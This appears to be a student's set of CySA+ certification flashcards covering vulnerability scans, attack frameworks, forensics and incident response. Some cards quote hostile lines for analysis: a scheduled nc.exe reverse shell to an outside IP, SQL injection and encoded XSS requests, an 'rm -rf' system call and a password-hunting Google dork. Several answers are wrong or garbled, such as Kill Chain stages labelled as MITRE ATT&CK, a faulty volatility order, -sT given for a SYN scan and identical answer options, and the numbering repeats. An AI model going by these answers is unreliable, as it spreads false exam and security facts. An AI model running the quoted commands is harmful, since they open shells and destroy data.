CySA+ Flashcards

1
Q

Vulnerability scan output: CVE-2011-3389
QID 42366 - SSLv3.0/TLSv1.0 Protocol Weak CBC Mode Server Side Vulnerability. Check with: openssl s_client -connect login.diontraining.com:443 -tls1 -cipher "AES:CAMELLIA:SEED:3DES:DES"
What category should this be classified as?

A

Web application cryptography vulnerability

2
Q

You're an analyst for a bank with offices in multiple states. You want to create an alert to detect if an employee from one bank office logs into a workstation in an office in another state. What type of detection and analysis are you configuring?

A

Behavior based

3
Q

You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security software recommends you should remediate this. What should you do?

A

Change all devices and servers that support it to 636 because encrypted services run by default on 636

4
Q

Your org has noticed an increase in the number of security incidents being detected. To better understand the situation and measure the effectiveness of your incident response process, what KPI (key performance indicator) could you use?

A

Alert volume: an increase may correlate with an increase of detected incidents

5
Q

What tools can be used to conduct a banner grab from a web server on a remote host?

A

netcat, wget, and telnet
(ftp can’t do it)

6
Q

A recent vulnerability scan found several vulnerabilities on an organization’s public facing IP address. To reduce the risk of a breach, which of the following vulnerabilities should be prioritized for remediation?

A

-A cryptographically weak cipher
-An HTTP response that reveals an internal IP address
-A website utilizing a self-signed SSL cert
*A buffer overflow that is known to allow remote code execution

7
Q

An adversary compromised a web server in your network using a zero-day exploit and then uses it as a C2 server for further attacks. Which stage of the MITRE ATT&CK framework does the use of a C2 server illustrate?

A

Command and Control (C2)

8
Q

Which analysis framework provides a graphical depiction of the attacker's approach relative to a kill chain?

A

Diamond Model of Intrusion Analysis

9
Q

Which framework provides the most explicit detail regarding how to mitigate or detect a given threat?

A

MITRE ATT&CK

10
Q

According to the Center for Internet Security's system design recommendations, which control category would contain info on the best security practices to implement within the SDLC?

A

Application Software Security

11
Q

A cybersecurity analyst has received an alert that sensors continuously observe well-known call-home messages at their network boundary. Still, the org's proxy firewall is properly configured to successfully drop the messages before they leave the network. What is the most likely cause of the messages being sent?

A

An infected workstation is attempting to reach a C2 server

12
Q

You’re investigating traffic involving 3 separate IP addresses (192.168.66.6, 10.66.6.10, 172.16.66.1). What REGEX expression would you use to be able to capture ONLY these 3 IP addresses?

A

\b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b

13
Q

You are conducting a quick nmap scan of a target network. You want to conduct a SYN scan but you don't have raw socket privileges on your workstation. What command should you use to conduct the SYN scan from your workstation?

A

nmap -sT

14
Q

Nicole’s org doesn’t have the budget for 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. What service provider would be best suited for this?

A

MSSP: Managed Security Service Provider

15
Q

A company's CIO is concerned about the liability of a security vulnerability being exploited in their self-driving car, where someone may die. What methodology would provide the single greatest mitigation if successfully implemented?

A

Formal methods of verification

16
Q

What provides a standard nomenclature for describing security-related software flaws?

A

CVE

17
Q

You suspect a system's firmware has been compromised. What type of firmware would provide resistance against such an attack?

A

Trusted Firmware

18
Q

What REGEX expression would provide the appropriate output when searching logs from only the IP subnet 172.161.1.224/26?

A

\b172.161.1.(2[0-4][0-9]|25[0-5]|19[2-9])\b

19
Q

What is least likely to be included in a data retention policy?

A

Classification Info

20
Q

As a forensic analyst, what should you collect first?

A

L3 cache (CPU registers), RAM cache (system memory), SSD (storage devices), backup drives

21
Q

Your company is adopting a cloud first architecture model. Management wants to decommission the on-prem SIEM and migrate it to the cloud. What issues could arise?

A

Legal and regulatory issues may prevent data migration to the cloud

22
Q

Diamond Model of Intrusion Analysis

A

Framework for understanding the four key elements of cyber attacks: adversary, victim, infrastructure, capability

23
Q

MITRE ATT&CK

A

Framework detailing tactics, techniques, and procedures.
Reconnaissance · Weaponization · Delivery · Exploitation · Installation · Command & Control (C2) · Actions on Objectives

24
Q

OWASP Testing Guide

A

Methodology for testing web application security

25
Q

Cyber Kill Chain

A

Describes the stages of a cyber attack. Makes no allowances for an adversarial retreat

26
Q

What secure coding practice ensures a character like < is translated into the &lt; string when written to an HTML page?

A

Output Encoding

27
Q

You are a cyber analyst at a privately owned bank. Which regulation would have the greatest impact on your bank's cybersecurity program?

A

GLBA
Gramm-Leach-Bliley Act
Federal law explaining how to protect customers' private info

28
Q

Root Cause Analysis

A

Involves investigating an incident to determine its origin and how it unfolded, with an aim of preventing similar incidents

29
Q

Forensic Analysis

A

Thorough investigation whose focus is broader and often includes legal implications

30
Q

What can prevent firmware downgrades?

A

eFuse
Intel-designed mechanism to allow software instructions to blow a transistor in the hardware chip

31
Q

You see the following log entry. What is it and how do you stop it?
sc config schedule start auto
net start schedule
at 10:42 "c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe"

A

The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp folder to create a remote connection to 123.12.34.12
You should recommend removing the host from the network

32
Q

What technique would provide the largest increase in security on a network with ICS, SCADA, and IOT devices?

A

User and entity behavior analytics

33
Q

tcpdump

A

Primarily used for capturing and analyzing network packets
Faster than Wireshark
No GUI

34
Q

What sanitization technique removes data by overwriting a hard drive with random 1s and 0s?

A

Clear

35
Q

Which part in a federation provides services to members of the federation?

A

RP: Relying Party

36
Q

IdP

A

Identity Provider
Provides identities, makes assertions about those identities and releases info about identity holders

37
Q

SAML

A

Security Assertion Markup Language
Open standard for exchanging authentication and authorization data between parties, including an IdP

38
Q

SSO

A

Single Sign On
Authentication scheme that allows users to log in with a single ID and password to related but independent software systems across a federation

39
Q

What technique is most likely to identify a buffer overflow vulnerability in an app during development?

A

Static code analysis

40
Q

You are searching a Linux server for a possible backdoor during a forensic investigation. Which part of the file system should you search for evidence?

A

/etc/xinetd.conf
newer versions: systemctl

41
Q

According to the MITRE ATT&CK framework, what capability can identify and exploit a zero-day vulnerability?

A

Developed

42
Q

What type of solution would you classify an FPGA?

A

Anti-tamper
Field-Programmable Gate Array

43
Q

WannaCry’s use of Eternal Blue represents which phase of the Cyber Kill Chain?

A

Weaponization

44
Q

What is the most widely used web-application scanner?

A

ZAP
OWASP Zed Attack Proxy

45
Q

What are 3 Infrastructure vulnerability scanners?

A

Qualys, OpenVAS, Nessus

46
Q

What type of file is commonly used to store configuration settings for a macOS system?

A

plists
(property lists)

47
Q

During a vulnerability scan you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on that info what do you suspect is true?

A

You scanned a CDN-hosted version of the site.
CDN: Content Delivery Network
Geographically distributed network of proxy servers

48
Q

What is the proper order of the UEFI boot phases?

A

Security
Pre-EFI initialization
Driver Execution Environment
Boot Device Select
Transient System Load
Runtime

49
Q

What proprietary tool is used to create forensic disk images without making changes to the original evidence?

A

FTK Imager

50
Q

Memdump

A

Used to collect content within RAM on a given host

51
Q

Autopsy

A

Open-source forensic tool suite

52
Q

Which role validates the user’s identity when using SAML for authentication?

A

IdP

53
Q

You need to sanitize hard drives from some leased workstations before returning them to a supplier. The hard drives contained sensitive data. What is the most appropriate process to ensure that data exposure doesn't occur during this process?

A

Purge, validate, and document the sanitization of the drives

54
Q

What technology can be used to ensure that users who log into a network are physically in the same building as the network they are attempting to authenticate on?

A

GPS location and NAC

55
Q

What describes the infrastructure needed to support the other architectural domains in the TOGAF framework?

A

Technical architecture

56
Q

Dion Training wants to implement tech within their corporate network to BEST mitigate risk that a zero-day virus might infect their workstations. What should be implemented FIRST?

A

Application Whitelisting

57
Q

You conduct a vulnerability scan of a data center and notice that a management interface for a virtualization platform is exposed to your vulnerability scanner. What network should the hypervisor's management interface be exposed to, to ensure the best security of the virtualization platform?

A

Management Network

58
Q

You have just returned from a business trip from a country with a high intellectual property theft rate. What precautions should you take before reconnecting your laptop to your corporate network?

A

Scan for malware
Physically inspect the laptop and compare it with images made before you left

59
Q

You are trying to find some files deleted by a user on a Windows workstation. What 2 locations are most likely to contain the deleted files?

A

Recycle Bin
Slack Space

60
Q

What does the Infrastructure component of the Diamond Model refer to?

A

The physical or virtual resources used (phishing)

61
Q

Persistence

A

MITRE ATT&CK framework
Stage that describes how the adversary maintains a foothold in the network

62
Q

Command and Control

A

MITRE ATT&CK framework
Represents the communication channel

63
Q

You want to prevent hosts from connecting to known malware distribution domains. What type of solution should be used without deploying endpoint protection software or an IPS?

A

DNS Blackholing
Uses a list of known domains/IPs belonging to malicious hosts and uses an internal DNS server to create a fake reply

64
Q

An org wants to choose an authentication protocol that can be used over an insecure network without implementing additional encryption services. What protocol should you use?

A

Kerberos

65
Q

An analyst suspects that a trojan has victimized a Linux system. Which command should be run to determine where the current bash shell is being executed from?

A

which bash

66
Q

SCAP

A

Security Content Automation Protocol
Multi-purpose framework of specifications supporting automated configuration, vulnerability, and patch checking, tech control compliance activities, and security measurement

67
Q

Security Onion

A

Free open-source Linux distro for intrusion detection, enterprise security monitoring, and log management

68
Q

What utilizes a well-written set of carefully developed and tested scripts to orchestrate runbooks and generate consistent server builds across an enterprise?

A

Infrastructure as Code (IaC)

69
Q

A forensic analyst needs to access a macOS encrypted drive that uses FileVault 2. What are 3 means of unlocking the volume?

A

Extract the keys from iCloud
Retrieve the key from memory while the volume is mounted
Obtain the recovery key

70
Q

You’re a security Admin and need to respond to an ongoing spearphishing campaign against your org. What should be used as a checklist of actions to perform to detect and respond to this particular incident?

A

Playbook

Runbook is an automated response

71
Q

Input validation can prevent what vulnerabilities?

A

SQL Injection
Cross-Site Scripting
XML Injection
Directory Traversal

72
Q

What is the lowest layer of a bare-metal virtualization environment?

A

The physical hardware

73
Q

What type of vulnerability scan would provide the best results if you want to determine if the target’s configuration settings are correct?

A

Credentialed Scan

74
Q

Non-Credentialed Scan

A

Vulnerability scan that relies on external resources for configuration settings, which can be incorrect or altered

75
Q

If you want to conduct an operating system identification during an nmap scan, what syntax should you use?

A

nmap -O

76
Q

You need to verify the installation of a critical Windows patch on your org’s workstations. What method would be the most efficient to validate the current patch status for all Windows 10 workstations?

A

Use SCCM to validate patch status
Microsoft’s System Center Configuration Manager

77
Q

You review a Python script used in your org's automation process. You notice the following line of code: os.system('rm -rfl'). What potential security concern does the code represent?

A

Command Injection

78
Q

Which operating system feature is designed to detect malware that is loaded early in the system startup process or before the OS can load itself?

A

Measured Boot

79
Q

If you post too much on social media like name, DOB, hometown,… it is easier for an attacker to conduct what type of attack?

A

Cognitive Password Attack

80
Q

What authentication protocol was developed by Cisco to provide authentication, authorization, and accounting services?

A

TACACS+
Terminal Access Controller Access-Control System

81
Q

What type of encryption would ensure the best security of a website?

A

TLS

82
Q

You review the logs of a proxy server and saw the following URL: http://test.diontraining.com/index/php?id=1%20OR%2017-7%3d10
What type of attack has likely occurred?

A

SQL Injection

83
Q

A pentester is conducting an assessment of a wireless network that is secured using WPA2 Enterprise encryption. What are the 2 major differences between conducting reconnaissance of a wireless network vs a wired one?

A

Physical accessibility and Encryption

84
Q

Management is concerned about rogue devices being attached to the network. What solutions would quickly provide the most accurate info that could be used to identify rogue devices on the network?

A

Router and Switch-based MAC address reporting

85
Q

What automatically combines multiple disparate sources of info to form a complete picture of events for analysts to use during an incident response or when conducting proactive threat hunting?

A

Data Enrichment

86
Q

You’re about to conduct forensics on a virtual machine. What process should be used to ensure that all of the data is acquired forensically?

A

Suspend the machine and copy the contents of the directory it resides in

87
Q

What will an adversary do during the exploitation phase of the Lockheed Martin kill chain?

A

Take advantage of a software, hardware, or human vulnerability
Wait for a user to click on a malicious link
Wait for a malicious email attachment to be opened

88
Q

When trying to thoroughly examine the security posture of a major e-commerce platform, which framework serves as an exhaustive guide dedicated explicitly to this purpose?

A

OWASP Testing Guide

89
Q

Where should a forensic analyst search to find a list of the wireless networks that a laptop has previously connected to with a company-owned laptop?

A

Search the registry

90
Q

What remediation strategies are the MOST effective in reducing the risk to an embedded ICS from a network-based compromise?

A

Segmentation
Disable unused services

91
Q

What are 3 concerns when migrating to a serverless architecture?

A

Protection of endpoint security
Dependency on the cloud service provider
Limited disaster recovery options

92
Q

A cyber analyst is reviewing the logs of a proxy server and saw the following URL: https://www.google.com/search?q=password+filetype%3xls+site%3Adiontraining.com&pws=0&filter=p.
What is true about the results of this search?

A

Personalization is turned off (pws=0)

Returns only files hosted at diontraining.com
(site%3Adiontraining.com; %3A is the hex code for ':')

Returns only Microsoft Excel spreadsheets
(q=password and filetype%3xls, i.e. filetype equal to xls; + separates the search terms)

93
Q

Which type of digital forensic investigation is most challenging due to the on-demand nature of the analyzed assets?

A

Cloud services

94
Q

Your company has announced a change to an “API first” model of software development. As a cyber analyst you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. What is the primary basis for an attack against this vulnerability?

A

Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution

95
Q

What does a User Agent request a resource from when conducting a SAML transaction?

A

SP (Service Provider)

96
Q

Your company has just enabled key-based authentication on its SSH server. What action should be performed to secure the SSH server?

A

Disable password authentication for SSH

97
Q

You are creating a script to filter some logs so that you can detect any suspected malware beaconing. What are some typical means of identifying a malware beacon's behavior on the network?

A

The beaconing interval
The beacon’s persistence
The removal of known traffic

98
Q

Policy

A

Contains procedures and guidelines covering appropriate priorities, actions, and responsibilities in the event of a security incident

99
Q

Procedure

A

Provides detailed, tactical info for the CSIRT to respond to an incident

100
Q

What method should a cyber analyst use to locate any instances on the network where passwords are being sent in cleartext?

A

Full packet capture

101
Q

You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Your network has several different OSs in use but you only have 1 machine available to test the patches. What is the best environment to use to perform the testing of the patches before deployment?

A

Virtualization

102
Q

In the Colonial Pipeline ransomware attack, the DarkSide ransomware group fulfilled their intent by encrypting files and demanding a ransom. Which phase of the Cyber Kill Chain does this represent?

A

Actions on Objectives

103
Q

Lockheed Martin Kill Chain Stages

A

Reconnaissance
Weaponization
Delivery
Exploitation
Installation
Command & Control (C2)
Actions on Objectives

104
Q

In the Cyber Kill Chain, at which stage does an attacker deliver the actual working part of the attack?

A

Exploitation

Exploitation: attacker leverages a vulnerability to execute the main part of the attack
Weaponization: attacker creates the malicious payload, does not deliver it

105
Q

Riaan’s company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which compensating control should be recommended until the system can be remediated?

A. Vulnerability scanning
B. Encryption
C. WAF
D. IPS

A

C. WAF

106
Q

A cybersecurity analyst reviews the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com
Which is true about the results of the search?

A. Returns all web pages containing an email address affiliated with diontraining.com
B. Returns all web pages containing the text diontraining.com
C. Returns all web pages hosted at diontraining.com
D. Returns no useful results

A

A. Returns all web pages containing an email address affiliated with diontraining.com

%40 is the hex code for @

107
Q

The 2018 Drupalgeddon2 incident saw hackers actively exploiting a highly critical vulnerability (CVE-2018-7600) in the Drupal content management system. Which versions of Drupal's security patch would have remediated this?

A. Drupal 7.56/8.3.4
B. Drupal 7.54/8.2.7
C. Drupal 7.57/8.4.5
D. Drupal 7.58/8.5.1

A

D. Drupal 7.58/8.5.1

108
Q

Which of the following functions is not provided by TPM?

A. User authentication
B. Random number generation
C. Sealing
D. Remote attestation
E. Binding
F. Secure Generation of cryptographic keys

A

A. User authentication

109
Q

Which of the following is NOT a host-related indicator of compromise?

A. Memory Consumption
B. Beaconing
C. Processor Consumption
D. Drive Capacity Consumption

A

B. Beaconing

Beaconing is considered a network-related IoC

110
Q

A cybersecurity analyst notices the following XML transaction while reviewing the communication logs for a public-facing application that receives XML input directly from its clients: ]>&abc;

Based on the output, which is true?

A. The application is using parameterized queries to prevent XML injections
B. An XML External Entity (XXE) vulnerability has been exploited and it is possible that the file "/etc/passwd" has been downloaded.
C. ISO-8859-1 only covers the Latin alphabet and may preclude other languages from being used
D. There is no concern since “/etc/passwd” does not contain any system passwords

A

B. An XML External Entity (XXE) vulnerability has been exploited and it is possible that the file "/etc/passwd" has been downloaded.

111
Q

Which of the following are the two most important factors when determining a containment strategy?

A. Preservation of evidence
B. Identification of whether the intrusion is the primary attack or a secondary one
C. Prevention of an ongoing intrusion or data breach
D. Avoidance of alerting the attacker that they have been discovered
E. Ensuring the safety and security of all personnel

A

C & E

112
Q

You’re a cybersecurity analyst who has been given the output from a system administrator’s Linux terminal. Based on the output, which of the following is true?
———— BEGIN OUTPUT ————
# nmap win2k16.local
Nmap scan report for win2k (192.168.2.15)
Host is up (0.132452s latency)
Not shown: 997 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
# nc win2k16.local 80
220 win2k16.local DionTraining SMTP Server (Postfix/2.4.1)
# nc win2k16.local 22
SSH-2.0-OpenSSH_7.2 Debian-2
———— END OUTPUT ————

A. Your org has a vulnerable version of the SSH server software installed
B. Your email server has been compromised
C. Your email server is running on a non-standard port
D. Your web server has been compromised

A

C. Your email server is running on a non-standard port.

Output shows SMTP is running on port 80 and the standard port is 25.

113
Q

A new security appliance was installed on a network as part of a managed service deployment. The vendor controls the appliance and the IT team cannot log in or configure it. The IT team is concerned about the appliance receiving the necessary updates. Which of the following should be performed to minimize the concern?

A. Scan and patch the device
B. Automatic Updates
C. Configuration management
D. Vulnerability scanning

A

D. Vulnerability scanning

114
Q

Dion Training is concerned with the possibility of employees accessing another user’s workstation in secured areas without their permission. Which would BEST prevent this from happening?

A. Install security cameras in secure areas to monitor logins
B. Require biometric identification for user logins
C. Require username and password for user logins
D. Enforce a policy that requires passwords to be changed every 30 days

A

B. Require biometric identification for user logins

115
Q

Your company has just finished replacing all of its computers with brand new workstations. A coworker asks the company if she can have the old computers that are about to be thrown away so she can refurbish them by reinstalling a new OS and donate them. The owner thinks it's a great idea but is concerned about the sensitive info on the drives. What is the best solution to sanitize or destroy the data while ensuring the computers will still be usable?

A. Purging
B. Shredding
C. Degaussing
D. Wiping

A

D. Wiping

Can't reuse a hard drive once it has been degaussed.
Generally can’t reuse after purging.

116
Q

Which term is used in software development to refer to the method in which app and platform updates are committed to a production environment rapidly?

A. Continuous integration
B. Continuous monitoring
C. Continuous deployment
D. Continuous delivery

A

C. Continuous deployment

117
Q

A major cyber incident has occurred at your org. As part of the incident response team you have been tasked with analyzing the incident, including who caused it, what systems were affected, when it occurred, where it originated from, and why it happened. What kind of report are you preparing?

A. Incident declaration report
B. Incident response report
C. Regulatory reporting
D. Root cause analysis report

A

B. Incident response report

118
Q

The security team from Kelly Nexis Analytics has detected the Apache Log4j vulnerability in JIRA. What is a practical method for the team to eliminate this vulnerability?

A. Patching
B. Antivirus Software
C. Virtual Private Network
D. Firewall Implementation

A

A. Patching

119
Q

Which of the following vulnerability scanning tools would be used to conduct a web application vulnerability assessment?

A. OpenVAS
B. Nessus
C. Nikto
D. Qualys

A

C. Nikto

120
Q

Which of the following has occurred if a device fails to activate because it has detected an unknown modification?

A. Improper authentication
B. Obfuscation
C. Self-checking
D. Failed trust foundry

A

C. Self-checking

121
Q

Which of the following is a technique used in Secure Disposal?

A. Zero-fill
B. Degaussing
C. Erasing
D. Clearing

A

B. Degaussing

Clearing does not destroy

122
Q

An SNMP sweep is being conducted but the sweep received no-response replies from multiple addresses that are believed to belong to active hosts. What does this indicate to a cybersecurity analyst?

A. The community string being used is invalid
B. Any listed answers may be true
C. The machines are not running SNMP servers
D. The machines are unreachable

A

B. Any listed answers may be true

123
Q

Dion Consulting Group has been hired to analyze the cybersecurity model for a new videogame console system. The manufacturer's team has come up with four recommendations to prevent intellectual property theft and piracy. As the cybersecurity consultant on this project, which of the following would you recommend implementing first?

A. Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchased which game
B. Ensure that all screen capture content is visibly watermarked
C. Ensure that all games for the console are distributed as encrypted so that they can only be decrypted on the game console
D. Ensure that all games require excessive storage sizes so that it is difficult for unauthorized parties to distribute

A

A. Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchased which game

124
Q

Which of the following protocols is commonly used to collect information about CPU utilization and memory usage from network devices?

A. NetFlow
B. SNMP
C. MIB
D. SMTP

A

B. SNMP (Simple Network Management Protocol)

125
Q

Which protocol is paired with OAuth2 to provide authentication of users in a federated identity management solution?

A. Kerberos
B. ADFS
C. OpenID Connect
D. SAML

A

C. OpenID Connect

126
Q

What type of information will a Cisco switch be configured to capture in its logs at logging level 7?

A. Emergencies
B. Warnings
C. Debugging
D. Errors

A

C. Debugging

0-Emergencies

127
Q

A vulnerability scan has returned the following:
Detailed Results
10.56.17.21 (APACHE-2.4)
Windows Shares
Category: Windows
CVE ID: -
Vendor Ref: -
Bugtraq ID: -
Service Modified - 8.30.2017
Enumeration Results:
print$ c:\windows\system32\spool\drivers
files c:\FileShare\Accounting
Temp c:\temp

What best describes the output?

A. There is no CVE present, so this is a false positive caused by Apache running on a Windows server
B. There is an unknown bug in an Apache server with no Bugtraq ID
C. Windows Defender has a known exploit that must be resolved or patched
D. Connecting to the host using a null session allows enumeration of the share names on the host

A

D. Connecting to the host using a null session allows enumeration of the share names on the host

127
Q

Your org is transitioning to a cloud environment and wants to ensure its new infrastructure is secure. What tool could you utilize to assess the security of your cloud infrastructure?

A. Pacu
B. Nmap
C. Nessus
D. Burp Suite

A

A. Pacu

This is designed for AWS environments.
Nessus is not specifically designed for cloud infrastructure assessments

128
Q

You are conducting an incident response and want to determine if any account-based IoCs exist in a compromised server. Which of the following would you NOT search for on the server?

A. Unauthorized sessions
B. Malicious processes
C. Off-hours usage
D. Failed logins

A

B. Malicious processes

A malicious process is a host-based IoC and is not directly associated with an account-based IoC

129
Q

Which of the following actions should you perform during the post-incident activities of an incident response?

A. Create an incident summary reporting with in-depth technical recommendations for future resourcing and budgeting
B. Perform evidence retention in accordance with the timescale defined by the regulatory or legal impact of the incident
C. Ensure confidentiality of the lessons learned report by not sharing it beyond the incident response team who handled the investigation
D. Sanitize storage devices that contain any dd images collected to prevent liability arising from evidence collection

A

B. Perform evidence retention in accordance with the timescale defined by the regulatory or legal impact of the incident

130
Q

A cybersecurity analyst has deployed a custom DLP signature to alert on any files that contain numbers in the format of a social security number. Which of the following concepts within DLP is being utilized?

A. Classification
B. Statistical matching
C. Document matching
D. Exact data match

A

D. Exact data match

131
Q

What port does LDAP run on?

A

389

131
Q

Your org has just migrated to provisioning its corporate desktops as virtual machines and accessing them using thin clients. The org believes this will enhance security since the desktop can be rewritten with a new baseline image every time the user logs into it. Based on this scenario, which technology has the organization adopted?

A. VPC
B. UEBA
C. VPN
D. VDI

A

D. VDI

VDI = Virtual Desktop Infrastructure
VPC = Virtual Private Cloud
UEBA = User and Entity Behavior Analytics

132
Q

Which of the following is not normally part of an endpoint security suite?

A. IPS
B. Software firewall
C. VPN
D. Anti-virus

A

C. VPN

133
Q

Natalie wants to create a backup of the permissions before making changes to the Linux workstation she will remediate. What Linux tool can she use to back up the permissions of the system’s complete directory structure?

A. iptables
B. chbkup
C. getfacl
D. aclman

A

C. getfacl

aclman and chbkup are not legitimate commands
iptables is used to configure the firewall

134
Q

During a simulated attack on your org’s network, the red team identified several vulnerabilities and successfully exfiltrated data. The red team then used these vulnerabilities and the steps they took to create an example of a possible real-world attack. Which framework does this attack sequence BEST represent?

A. MITRE ATT&CK
B. OWASP Testing Guide
C. Cyber Kill Chain
D. Diamond Model of Intrusion Analysis

A

C. Cyber Kill Chain

135
Q

Matt is creating a scoping worksheet for an upcoming penetration test for his organization. Which of the following techniques is NOT usually included in a pen test?

A. Denial-of-service Attack
B. Physical Penetration Attempts
C. Reverse Engineering
D. Social Engineering

A

A. Denial-of-service Attack

136
Q

You have been given access to a Windows system located on an Active Directory domain as part of a white box pen test. Which of the following commands would provide information about the other systems on this network?

A. net group
B. net use
C. net config
D. net user

A

B. net use

net group is only used on DCs
net user would show accounts
net config allows server and workstation services to be controlled once identified

137
Q

During a port scan you discovered a service running on a registered port. Based on this, what do you know about this service?

A. The service is running on a port between 0-1023
B. The service’s name on the registered port
C. The service is running on a port between 1024 - 49151
D. The vulnerability status of the service on the registered port

A

C. The service is running on a port between 1024-49151

138
Q

Which of the following categories of controls are firewalls, IDS, and a RADIUS server classified as?

A. Administrative Controls
B. Technical Controls
C. Physical Controls
D. Compensating Controls

A

B. Technical Controls

139
Q

You just finished conducting a remote scan of a class C network block using the following command ‘nmap -sS 202.15.73.0/24’. The results only showed a single web server. Which of the following techniques would allow you to gather additional info about the network?

A. Use an IPS evasion technique
B. Scan using the -p 1-65535 flag
C. Use a UDP scan
D. Perform a scan from on-site

A

D. Perform a scan from on-site

140
Q

Which tool should a malware analyst utilize to track changes to the registry and the file system while running a suspicious executable on a Windows system?

A. ProcDump
B. Autoruns
C. Process Monitor
D. DiskMon

A

C. Process Monitor

Autoruns shows what programs are configured to run during bootup or login

141
Q

What is a reverse proxy commonly used for?

A. Directing traffic to internal services if the contents of the traffic comply with the policy
B. Allowing access to a virtual private cloud
C. To prevent unauthorized use of cloud services from the local network
D. To obfuscate the origin of a user within a network

A

A. Directing traffic to internal services if the contents of the traffic comply with the policy

142
Q

During which incident response phase is the preservation of evidence performed?

A. Detection and analysis
B. Containment, eradication, and recovery
C. Preparation
D. Post-incident activity

A

B. Containment, eradication, and recovery

143
Q

During a recent security incident, you, as an incident responder, documented each action and decision that took place, from the initial detection to final remediation. This detailed timeline could prove particularly useful for which part of the incident response reporting?

A. Impact
B. Executive summary
C. Lessons learned
D. Scope

A

C. Lessons learned

144
Q

You’re analyzing the logs of a web server and see the following:
192.168.1.25 - - [05/Aug/2020:15:16:42 -0400] "Get /%27%27;!-%22%3CDION%3E=&{()} HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; en-US; rv:1.9.0.12) Gecko/2009070812 Ubuntu/19.04 (disco dingo) Firefox/3.0.12"

Based on this, which following attack was attempted?

A. XML injection
B. Buffer overflow
C. SQL injection
D. XSS

A

D. XSS

The attack was obfuscated by the attacker using HTML encoding. The encoding of %27%27 translates to two single quote marks (‘ ‘).

145
Q

You are analyzing DNS logs looking for indicators of compromise associated with the use of a fast-flux network. You are already aware that the names involved in this particular fast-flux network are longer than 50 characters and always end in a .org top-level domain. Which of the following REGEX expressions would you use to filter DNS traffic that matches this?

A. \b[A-Za-z0-9.-]{50,251}+.org
B. \b[A-Za-z0-9.-]{50,251}+.org
C. \b[A-Za-z0-9.-]{50,251}+.org
D. \b(A-Za-z0-9.-){50,251}|.org

A

A. \b[A-Za-z0-9.-]{50,251}+.org

+ means it matches between 50 and 251 instances of any of the preceding letters (A-Z, a-z, 0-9, period, and the minus symbol)

146
Q

During the Sony Pictures hack in 2014, the attackers installed a wiper malware named Destover on Sony’s systems to erase data. Which phase of the Cyber Kill Chain does this represent?

A. Delivery
B. Installation
C. Reconnaissance
D. Actions and Objectives

A

B. Installation

147
Q

A penetration tester is using a known vulnerability to compromise an Apache webserver. After they gain access to the server, what is their next step to pivot to a protected system behind the DMZ?

A. Vulnerability scanning
B. Patching
C. Privilege escalation
D. Installing additional tools

A

C. Privilege escalation

148
Q

A cybersecurity analyst is reviewing the DNS logs for his company’s networks and sees the following:
$ cat dns.log | bro-cut query
gu2m9qhychvxrvh0eift.com
oxboxkgtyx9veimcuyri.com
4f3mvgt0ah6mz92frsmo.com
asvi6d6ogplqyfhrn0p7.com
5qlark642x5jbissjm86.com

Based on this potential IoC, which of the following hypotheses should you make to begin threat hunting?

A. The DNS server is running out of memory due to a memory resource exhaustion attack
B. Data exfiltration is being attempted by an APT
C. Fast flux DNS is being used for an attacker’s C2
D. The DNS server’s hard drive is being used as a staging location for a data exfiltration

A

C. Fast flux DNS is being used for an attacker’s C2

149
Q

After a successful spear-phishing attack, an adversary has gained access to your organization’s network. The adversary then performs a Pass-the-Hash attack to gain administrative privileges, moves horizontally in the network, and finally exfiltrates sensitive data. What stage of the MITRE ATT&CK framework does this movement represent?

A. Lateral Movement
B. Exfiltration
C. Initial Access
D. Credential Access

A

A. Lateral Movement

150
Q

You suspect that a service called explorer.exe on a Windows server is malicious, and you need to terminate it. Which of the following tools would NOT be able to terminate it?

A. sc
B. wmic
C. services.msc
D. secpol.msc

A

D. secpol.msc

secpol.msc = security policy auditor

151
Q

In the preparation phase of the incident management life cycle, which aspect involves assembling and maintaining a collection of scripts, applications, and other software that can be used to respond to a cyber threat effectively?

A. Incident response plan
B. Business continuity disaster recovery
C. Tools
D. Playbooks

A

C. Tools

152
Q

Evaluate the following log entry:
Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0

Based on this, which statements are true?

A. MAC filtering is enabled on the firewall
B. Packets are being blocked inbound to and outbound from the network
C. The packet was blocked outbound from the network
D. An attempted connection to the ssh service was prevented
E. The packet was blocked inbound to the network
F. An attempted connection to the telnet service was prevented

A

E. The packet was blocked inbound to the network
F. An attempted connection to the telnet service was prevented

153
Q

When assessing risks to your organization’s IT infrastructure, which framework allows for prioritization based on the potential impact of threats?

A. ISO 31000
B. OWASP Top 10
C. NIST’s Cybersecurity Framework
D. Center for Internet Security (CIS) Top 20 Critical Security Controls

A

C. NIST’s Cybersecurity Framework

154
Q

A cybersecurity analyst is working at a college that wants to increase its network’s security by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. Any proposed solution must scale up and down as new students and faculty use the network. Additionally, the analyst wants to minimize the number of false positives to ensure accuracy in their results. The chosen solution must also be centrally-managed through an enterprise console. Which of the following scanning topologies would be BEST able to meet these requirements?

A. Combination of server-based and agent-based scanning engines
B. Passive scanning engine located at the core of the network infrastructure
C. Combination of cloud-based and server-based scanning engines
D. Active scanning engine installed on the enterprise console

A

D. Active scanning engine installed on the enterprise console

154
Q

